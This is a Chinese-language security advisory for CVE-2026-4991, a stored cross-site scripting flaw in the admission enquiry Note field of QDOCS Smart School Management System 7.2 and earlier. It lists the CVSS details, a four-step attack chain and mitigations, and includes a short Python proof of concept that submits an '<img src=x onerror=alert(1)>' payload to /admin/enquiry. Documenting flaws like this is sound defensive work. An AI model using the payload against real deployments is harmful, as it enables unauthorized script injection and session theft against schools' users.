CVE-2026-4991 CVSS 3.5 低危

CVE-2026-4991: QDOCS智能学校管理系统XSS漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4991

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

QDOCS Smart School Management System

漏洞概述

QDOCS Smart School Management System 7.2及之前版本被发现存在跨站脚本漏洞。该漏洞源于招生咨询模块（/admin/enquiry）对Note参数的处理不当。攻击者可利用此漏洞注入恶意脚本，当管理员或其他用户查看被污染的咨询记录时触发。尽管攻击需要低权限和用户交互，但仍可能破坏系统完整性。

技术细节

该漏洞属于跨站脚本攻击（XSS），具体影响QDOCS Smart School Management System的Admission Enquiry Module。漏洞根源在于应用程序在处理/admin/enquiry接口请求时，未对名为'Note'的参数进行有效的输入验证和输出编码。攻击者可以构造包含JavaScript代码的特制Payload，并通过Note参数提交至服务器。由于系统未过滤特殊字符，恶意代码会被存储。当具有权限的用户访问并渲染该数据时，恶意脚本将在客户端执行。根据CVSS向量分析，攻击复杂度低，但需要用户交互（UI:R），这通常意味着攻击者需要进行社会工程学诱导。虽然对机密性和可用性无直接影响（C:N, A:N），但完整性风险（I:L）允许攻击者在受害者浏览器中执行操作，如篡改页面内容或窃取Cookie。

攻击链分析

STEP 1

1. 获取访问权限

攻击者注册或获取一个低权限账户（PR:L），访问招生咨询模块。

STEP 2

2. 注入Payload

攻击者在/admin/enquiry页面的Note字段中输入恶意JavaScript代码并提交。

STEP 3

3. 诱导访问

攻击者等待或诱导管理员/审核人员查看该条含有恶意Note的咨询记录。

STEP 4

4. 执行攻击

当受害者浏览器渲染未经过滤的Note内容时，XSS触发，执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-4991 PoC Concept
# Target: QDOCS Smart School Management System <= 7.2
# Endpoint: /admin/enquiry

target_url = "http://target-ip/admin/enquiry"
session = requests.Session()

# Login to get low privilege session (PR:L)
# credentials = {"user": "student", "pass": "password"}
# session.post("http://target-ip/login", data=credentials)

# Malicious payload injected into 'Note' argument
payload = '<img src=x onerror=alert(1)>'

data = {
    "Note": payload,
    # ... other required parameters for the enquiry ...
}

try:
    response = session.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the /admin/enquiry page to see if the alert triggers.")
    else:
        print(f"[-] Failed to send payload. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

QDOCS Smart School Management System <= 7.2

防御指南

临时缓解措施

在官方补丁发布前，建议管理员暂时禁用招生咨询模块中的Note输入功能，或者通过WAF（Web应用防火墙）拦截包含常见XSS特征字符（如<, >, ', ", javascript:）的请求。同时，加强对咨询记录的审核流程。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4991
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4991
3 Details https://www.cvedetails.com/cve/CVE-2026-4991/
4 VulDB https://vuldb.com/cve/CVE-2026-4991
5 Link https://vuldb.com/?ctiid.353878
6 Link https://vuldb.com/?id.353878
7 Link https://vuldb.com/?submit.776300

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表